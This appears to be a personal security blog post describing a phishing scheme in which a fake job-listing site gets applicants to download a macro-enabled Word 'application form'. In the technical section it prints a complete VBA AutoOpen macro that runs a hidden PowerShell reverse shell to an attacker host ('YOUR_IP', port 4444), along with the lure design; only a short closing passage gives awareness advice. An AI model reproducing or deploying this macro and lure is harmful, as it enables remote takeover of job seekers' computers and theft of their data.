The Dark Side of Job Hunting: Reverse Shells Embedded in Application Forms

PROJECTSBLOGS

Winston.I

4/6/20252 min read

As cybersecurity professionals, we often think about patching systems and blocking known exploits — but some of the most effective attacks require no code execution on the site itself. They exploit something much more powerful: human behavior.

In one of my recent projects, I explored how a job listing website could be used as a social engineering vector to deliver a malicious Word document that grants the attacker a reverse shell when opened.

The Premise

The concept was simple but deadly effective:

  1. Create a job listing site that looks professional and trustworthy.

  2. Present job seekers with a convincing job post, complete with descriptions, benefits, and a call to action.

  3. When a user clicks “Apply Now,” they’re asked to download a Word document that contains an “application form.”

  4. The Word document, however, contains a malicious macro that silently initiates a reverse shell when opened and macros are enabled.

The Technical Breakdown

The Website

The site itself was built using HTML, CSS, and JavaScript — nothing suspicious. It featured:

  • A landing page with job categories

  • Detailed job descriptions

  • An Apply Now button that linked to a downloadable .docm (macro-enabled Word file)

Example:

<a href="/documents/application_form.docm" download>Apply Now</a>

The Malicious Word Document

The .docm file appeared to be a standard form. But embedded within the document was a VBA macro designed to execute a reverse shell.

Macro Snip(VBA):

Sub AutoOpen()

Dim str As String

str = "powershell -w hidden -nop -c ""$client = New-Object System.Net.Sockets.TCPClient('YOUR_IP',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"""

Shell str, vbHide

End Sub

This macro silently establishes a connection to the attacker’s machine once the user opens the document and enables macros (which many job seekers do, thinking it’s required for the form to function).

Listener Setup

On the attacker machine, I simply listened for incoming connections using:

Once the document was opened, the reverse shell connected successfully, giving full control of the victim's system from the attacker’s terminal.

Why This Works

This type of attack is effective because:

  • The target initiates the download themselves

  • The file is disguised as a job application form

  • Many users enable macros when prompted, especially when they believe it’s part of a legitimate process

It’s a prime example of living off the land — no need for sophisticated exploits when the human factor can be leveraged.

Final Thoughts

This project was a powerful reminder that the most effective attacks often don’t target software — they target decisions. In this case, clicking “Apply Now” led to full system access.

It’s essential for both users and organizations to remain skeptical of even the most familiar interfaces. Not every job offer is an opportunity — some are entry points for exploitation.